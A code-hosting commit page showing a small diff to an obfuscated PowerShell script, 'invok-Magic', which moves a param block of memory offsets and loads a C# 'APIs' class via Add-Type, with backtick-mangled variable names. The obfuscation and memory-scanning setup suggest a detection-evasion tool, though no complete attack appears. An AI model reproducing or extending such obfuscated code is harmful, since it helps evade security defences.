enotkrutoy commited on
Commit
61605e5
·
verified ·
1 Parent(s): 8890a6b

Update test/invok-Magic

Browse files
Files changed (1) hide show
  1. test/invok-Magic +8 -7
test/invok-Magic CHANGED
@@ -1,5 +1,12 @@
1
  function Magic {
2
 
 
 
 
 
 
 
 
3
 
4
  ${ap`Is} = @"
5
  using System;
@@ -31,13 +38,7 @@ public class APIs {
31
  "@
32
 
33
  Add-Type ${ap`iS}
34
- param(
35
- ${In`iti`AlsTArt} = 0x50000,
36
- ${nE`g`A`TIVeofFSET}= 0x50000,
37
-
38
- ${m`A`xOffs`et} = 0x1000000,
39
- ${reA`dByT`Es} = 0x50000
40
- )
41
  ${iNiT`I`A`lDATe}=Get-Date;
42
 
43
  ${St`R`ING} = ("{1}{2}{3}{0}"-f 'ld','h','ello, w','or')
 
1
  function Magic {
2
 
3
+ param(
4
+ ${In`iti`AlsTArt} = 0x50000,
5
+ ${nE`g`A`TIVeofFSET}= 0x50000,
6
+
7
+ ${m`A`xOffs`et} = 0x1000000,
8
+ ${reA`dByT`Es} = 0x50000
9
+ )
10
 
11
  ${ap`Is} = @"
12
  using System;
 
38
  "@
39
 
40
  Add-Type ${ap`iS}
41
+
 
 
 
 
 
 
42
  ${iNiT`I`A`lDATe}=Get-Date;
43
 
44
  ${St`R`ING} = ("{1}{2}{3}{0}"-f 'ld','h','ello, w','or')